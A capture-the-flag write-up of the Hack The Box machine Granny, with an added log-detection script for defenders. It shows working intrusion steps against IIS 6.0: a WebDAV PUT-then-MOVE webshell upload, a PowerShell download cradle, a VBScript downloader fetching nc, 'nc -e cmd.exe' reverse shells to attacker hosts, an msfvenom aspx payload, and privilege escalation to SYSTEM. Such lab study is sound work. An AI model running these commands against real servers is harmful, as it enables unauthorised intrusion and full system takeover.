HTB Lab Series: Windows Machine Granny
Date: 2022-12-22 23:00:00
Reconnaissance
As usual, we start reconnaissance with nmap.
First a quick scan:
nmap 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 CST
Nmap scan report for 10.10.10.15
Host is up (0.38s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 39.33 seconds
Only port 80 is open, so this is a pure web target.
Then a detailed scan of that port:
nmap -sCV 10.10.10.15 -p 80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:32 CST
Nmap scan report for 10.10.10.15
Host is up (0.71s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sat, 01 Jan 2022 02:32:39 GMT
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
The server is IIS 6.0, so the operating system is most likely Windows Server 2003 or earlier.
Next, scan for sensitive directories with dirsearch:
python3.9 dirsearch.py -u http://10.10.10.15

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10977

Output File: /root/dirsearch/reports/10.10.10.15/_22-01-01_10-30-44.txt
Error Log: /root/dirsearch/logs/errors-22-01-01_10-30-44.log

Target: http://10.10.10.15/

[10:32:59] 301 -  153B - /_private  ->  http://10.10.10.15/_private/
[10:32:59] 200 -  246B - /_private/
[10:33:00] 301 -  155B - /_vti_bin  ->  http://10.10.10.15/_vti_bin/
[10:33:00] 200 -  759B - /_vti_bin/
[10:33:00] 200 -  195B - /_vti_bin/_vti_aut/author.dll
[10:33:00] 200 -   96B - /_vti_bin/shtml.dll
[10:33:00] 200 -   96B - /_vti_bin/shtml.exe?_vti_rpc
[10:33:00] 200 -  106B - /_vti_bin/shtml.exe/qwertyuiop
[10:33:00] 200 -  105B - /_vti_bin/shtml.dll/asdfghjkl
[10:33:00] 200 -  246B - /_vti_log/
[10:33:00] 500 -   88B - /_vti_pvt/users.pwt
[10:33:00] 301 -  155B - /_vti_log  ->  http://10.10.10.15/_vti_log/
[10:33:00] 500 -   88B - /_vti_pvt/users.pwd
[10:33:01] 500 -   88B - /_vti_cnf/
[10:33:01] 200 -    2KB - /_vti_inf.html
[10:33:01] 200 -  195B - /_vti_bin/_vti_adm/admin.dll
[10:34:29] 200 -  369B - /aspnet_client/
[10:34:29] 301 -  158B - /aspnet_client  ->  http://10.10.10.15/aspnet_client/
[10:36:14] 200 -  242B - /images/
[10:36:14] 301 -  149B - /images  ->  http://10.10.10.15/images/
[10:37:47] 200 -    2KB - /postinfo.html

Task Completed
We have identified the IIS 6.0 middleware above; let's search for known vulnerabilities in it.
searchsploit IIS 6.0
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Ad                  | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows                   | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack E                  | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote                  | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Sta                  | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathF                  | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authenti                  | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authenti                  | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authenti                  | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authenti                  | windows/remote/8806.pl
Microsoft IIS 6.0/7.5 ( PHP) - Multiple V                   | windows/remote/19033.txt
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
There are several WebDAV vulnerabilities listed for IIS.
WebDAV is an FTP-like file-sharing protocol: it supports uploading files, reading them, and similar operations.
We already saw in the nmap scan that this WebDAV instance allows a large number of methods:
Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
So we can use davtest to check which file types this WebDAV endpoint lets us upload and which of them the server will execute:
root@kali# davtest -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: l8Qkwc
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_l8Qkwc
********************************************************
Sending test files
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT asp FAIL
PUT php SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT cgi FAIL
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT shtml FAIL
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT html SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
EXEC jsp FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC cfm FAIL
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_l8Qkwc
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
Many file types upload successfully, but only the txt and html files are served (executed) afterwards.
davtest does not test aspx upload and execution at all, so let's test that manually.
root@kali# echo 1234 > test.txt
root@kali# curl -X PUT http://10.10.10.15/test.txt -d @test.txt
root@kali# curl http://10.10.10.15/test.txt
1234
root@kali# curl -X PUT http://10.10.10.15/test.aspx -d @test.txt
The page cannot be displayed
The page cannot be displayed
You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed.
Please try the following:
- Contact the Web site administrator if you believe this directory should allow execute access.
HTTP Error 403.1 - Forbidden: Execute access is denied.
Internet Information Services (IIS)
Technical Information (for support personnel)
- Go to Microsoft Product Support Services and perform a title search for the words HTTP and 403.
- Open IIS Help, which is accessible in IIS Manager (inetmgr),
and search for topics titled Configuring ISAPI Extensions, Configuring CGI Applications, Securing Your Site with Web Site Permissions, and About Custom Error Messages.
- In the IIS Software Development Kit (SDK) or at the MSDN Online Library, search for topics titled Developing ISAPI Extensions, ISAPI and CGI, and Debugging ISAPI Extensions and Filters.
The server rejects our request to upload an aspx file.
But we saw earlier that the MOVE method is supported. Can we upload a txt file and then rename it to aspx?
root@kali# cp /usr/share/webshells/aspx/cmdasp.aspx .
root@kali# curl -X PUT http://10.10.10.15/cmdasp.txt -d @cmdasp.aspx
root@kali# curl -X MOVE -H 'Destination:http://10.10.10.15/cmdasp.aspx' http://10.10.10.15/cmdasp.txt
And this succeeds.
In other words, the server refuses a direct aspx upload, but an aspx file that arrives through a rename is executed.
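From a defender's side, the PUT-then-MOVE trick above leaves a clear trace in the IIS W3C logs: a write verb that the server accepted, followed by a MOVE of the same path and a successful GET of a script file with the same base name from the same client. The following is an added example (not part of the original writeup or of any tool it mentions) that parses W3C-format log text and flags both the accepted write verbs and the upload-rename-execute sequence. The log lines are constructed samples; the field layout is the default IIS W3C set, which does not record the MOVE Destination header, so the base-name match is a heuristic.

```python
"""Added example: detect the WebDAV upload-then-rename pattern in IIS W3C logs.
The sample log below is constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

# WebDAV verbs that modify content; on a read-only site each accepted one is an alert.
WRITE_VERBS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
# Server-side script extensions a renamed upload would aim for.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed sample log in the default IIS W3C layout (times are UTC).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2022-01-01 02:40:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2022-01-01 02:40:01 10.10.10.15 GET /index.html - 80 - 10.10.14.3 Mozilla/5.0 200 0 0
2022-01-01 02:41:10 10.10.10.15 PUT /met.txt - 80 - 10.10.14.14 curl/7.74.0 201 0 0
2022-01-01 02:41:12 10.10.10.15 MOVE /met.txt - 80 - 10.10.14.14 curl/7.74.0 201 0 0
2022-01-01 02:41:20 10.10.10.15 GET /met.aspx - 80 - 10.10.14.14 curl/7.74.0 200 0 0
2022-01-01 02:42:00 10.10.10.15 PUT /test.aspx - 80 - 10.10.14.14 curl/7.74.0 403 1 0
2022-01-01 02:43:00 10.10.10.15 PROPFIND / - 80 - 10.10.14.3 Mozilla/5.0 207 0 0
"""


def parse_w3c(text):
    """Parse W3C extended log text into dict rows; '#Fields:' names the columns."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        row = dict(zip(fields, values))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        row["sc-status"] = int(row["sc-status"])
        rows.append(row)
    return rows


def successful_writes(rows):
    """Every write verb the server accepted with a 2xx status."""
    return [(r["c-ip"], r["cs-method"], r["cs-uri-stem"]) for r in rows
            if r["cs-method"] in WRITE_VERBS and 200 <= r["sc-status"] < 300]


def stem(uri):
    """Base name without extension, e.g. '/met.txt' -> 'met'."""
    name = uri.rsplit("/", 1)[-1]
    return (name.rsplit(".", 1)[0] if "." in name else name).lower()


def rename_to_script(rows, window=timedelta(minutes=5)):
    """Flag PUT of a non-script file, an accepted MOVE of that path, then a 200 GET of a
    script file with the same base name, all from one client inside `window`."""
    findings = []
    by_ip = defaultdict(list)
    for r in rows:
        by_ip[r["c-ip"]].append(r)
    for ip, evs in by_ip.items():
        evs.sort(key=lambda r: r["ts"])
        for i, put in enumerate(evs):
            if put["cs-method"] != "PUT" or not 200 <= put["sc-status"] < 300:
                continue
            if put["cs-uri-stem"].lower().endswith(SCRIPT_EXTS):
                continue  # direct script upload; successful_writes() already reports it
            moved = False
            for later in evs[i + 1:]:
                if later["ts"] - put["ts"] > window:
                    break
                if (later["cs-method"] == "MOVE" and later["cs-uri-stem"] == put["cs-uri-stem"]
                        and 200 <= later["sc-status"] < 300):
                    moved = True
                elif (moved and later["cs-method"] == "GET" and later["sc-status"] == 200
                        and later["cs-uri-stem"].lower().endswith(SCRIPT_EXTS)
                        and stem(later["cs-uri-stem"]) == stem(put["cs-uri-stem"])):
                    findings.append((ip, put["cs-uri-stem"], later["cs-uri-stem"]))
                    break
    return findings


if __name__ == "__main__":
    parsed = parse_w3c(SAMPLE_LOG)
    for f in successful_writes(parsed):
        print("accepted write:", f)
    for f in rename_to_script(parsed):
        print("upload-rename-execute:", f)
```

The rejected `PUT /test.aspx` (403) is deliberately not reported as a write, and the PROPFIND from the other client is read-only, so on the sample only the two accepted writes and the single rename sequence from 10.10.14.14 come out. Disabling the write verbs (or WebDAV entirely) on a static site removes the pattern at the source; the log check is the compensating control where that is not possible.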
Getting the lakis user privileges
Attacking with msf
A Baidu search turns up many references to CVE-2017-7269, so let's try that exploit.
After downloading it, place it in msf's exploit module folder:
/usr/share/metasploit-framework/modules/exploits/windows/iis/
Note the file name: msf cannot load a module whose filename contains a hyphen (-).
Then run it from msf and the exploit lands.
Once it lands, you will notice a problem:
stdapi_sys_config_getuid: Operation failed: Access is denied.
I don't know the cause of this error, only the workaround.
It is the same thing we normally do after getting a shell with msf to hide the process: merge the shell into an existing application.
Migrating the PID
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 580   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 772   392   svchost.exe
 788   392   svchost.exe
 924   392   spoolsv.exe
 952   392   msdtc.exe
 1064  392   cisvc.exe
 1112  392   svchost.exe
 1168  392   inetinfo.exe
 1204  392   svchost.exe
 1316  392   VGAuthService.exe
 1384  392   vmtoolsd.exe
 1488  392   svchost.exe
 1596  392   svchost.exe
 1708  392   dllhost.exe
 1768  392   dllhost.exe
 1936  392   alg.exe
 1964  580   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2096  392   vssvc.exe
 2172  1488  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2240  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2288  2172  calc.exe           x86   0                                      C:\WINDOWS\system32\calc.exe
 2444  788   wmiadap.exe
 2464  580   wmiprvse.exe
meterpreter > getpid
Current pid: 2288
meterpreter > migrate 2172
[*] Migrating from 2288 to 2172...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
This step binds the shell to process 2172, w3wp.exe; after that everything works normally.
Manual method
Plain shell
We already planted an aspx file on the web site as a command-execution page, so we can use that page either to spawn a shell directly or to drop something like an aspx payload and get an msf shell.
To spawn the shell directly, enter the following in the command box:
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http://10.10.16.7/Invoke-PowerShellTcpOneLine.ps1')
Note that before using this script you need to serve it locally with Python's SimpleHTTPServer:
python -m SimpleHTTPServer 80
(The script comes from nishang's GitHub.)
However, it fails. Why? Probably because this server has no PowerShell. So we can take another approach: use a VBScript that acts as wget to download nc, then use nc to forward a shell (idea from Bro10).
Create the VBScript:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Then call it to fetch nc from the host where we started the HTTP server:
cscript wget.vbs http://10.10.16.7/nc.exe nc.exe
Then use nc to forward a shell:
nc -e cmd.exe 10.10.16.7 4444
We get a shell.
msf shell
In the same way, we can use the rename trick to upload a small msf aspx payload and get a more comfortable reverse shell.
First, build the payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met.aspx
root@kali# curl -X PUT http://10.10.10.15/met.txt --data-binary @met.aspx
root@kali# curl -X MOVE -H 'Destination: http://10.10.10.15/met.aspx' http://10.10.10.15/met.txt
Note that this time I upload the file in binary mode (--data-binary). Uploading it as form data (-d) mangles the file contents and the payload fails to execute.
Then start the msf handler and trigger the payload:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.14:443
Trigger the payload by requesting the page:
curl http://10.10.10.15/met.aspx
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.14:443 -> 10.10.10.15:1032) at 2019-03-06 17:05:07 -0500
meterpreter >
We get a shell.
Getting root privileges
Using msf
First, use the post-exploitation modules. Send the session to the background:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/cve_17_7269) > search post/multi/recon/local_exploit_suggester
Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/cve_17_7269) > use 0
This module enumerates which local vulnerabilities the compromised system has.
The sessions command shows your session id; set the options accordingly and run.
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  1         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ GRANNY       10.10.16.2:4444 -> 10.10.10.15:1030 (10.10.10.15)

msf6 post(multi/recon/local_exploit_suggester) > run
Check the results:
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 38 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Three vulnerabilities are reported as present: MS14-058, MS14-070 and MS15-051.
use exploit/windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.102    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.16.2
lhost => 10.10.16.2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Launching notepad to host the exploit...
[+] Process 2348 launched.
[*] Reflectively injecting the exploit DLL into 2348...
[*] Injecting exploit into 2348...
[*] Exploit injected. Injecting payload into 2348...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.16.2:4444 -> 10.10.10.15:1031) at 2022-01-01 15:06:34 +0800
meterpreter > dir
Listing: c:\windows\system32\inetsrv
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Manual method
This approach is for the PWK/OSCP exam rules, where msf may not be used.
Run sysinfo to collect the target's information, paste it into a local txt file, and analyse it with wes.
That reveals the presence of
the MS09-012 vulnerability.
We can install sqlninja and use the exploit it ships with, /usr/share/sqlninja/apps/churrasco.exe, to escalate privileges.
Use the VBScript wget we wrote above to download it:
cscript wget.vbs http://10.10.14.42:8000/churrasco.exe churrasco.exe
Then run it, using nc to forward the shell:
churrasco.exe -d "C:\temp\nc.exe -e cmd.exe 10.10.16.7 5555"
Then catch it with nc on the attacking machine:
nc -lvnp 5555
How the privilege escalation works
After doing some research around the exploit the best resource was from Microsoft's official disclosure website. To summarise in a simple and brief way the vulnerability first of all exists within the Microsoft Distributed Transaction Coordinator (MSDTC). The MSDTC leaves a NetworkService token that can be impersonated (meaning it will run with that token's privileges and permissions) by any process that calls into it. Meaning the vulnerability allows a process that is not running under the NetworkService account but has the SeImpersonatePrivilege to elevate its privilege and therefore execute code under NetworkService privilege.
Thanks
HTB Granny Writeup | Bros10, for the manual privilege-escalation approach and the VBScript idea for hosts without PowerShell
HTB: Granny | 0xdf hacks stuff, for the approach of solving the upload problem with curl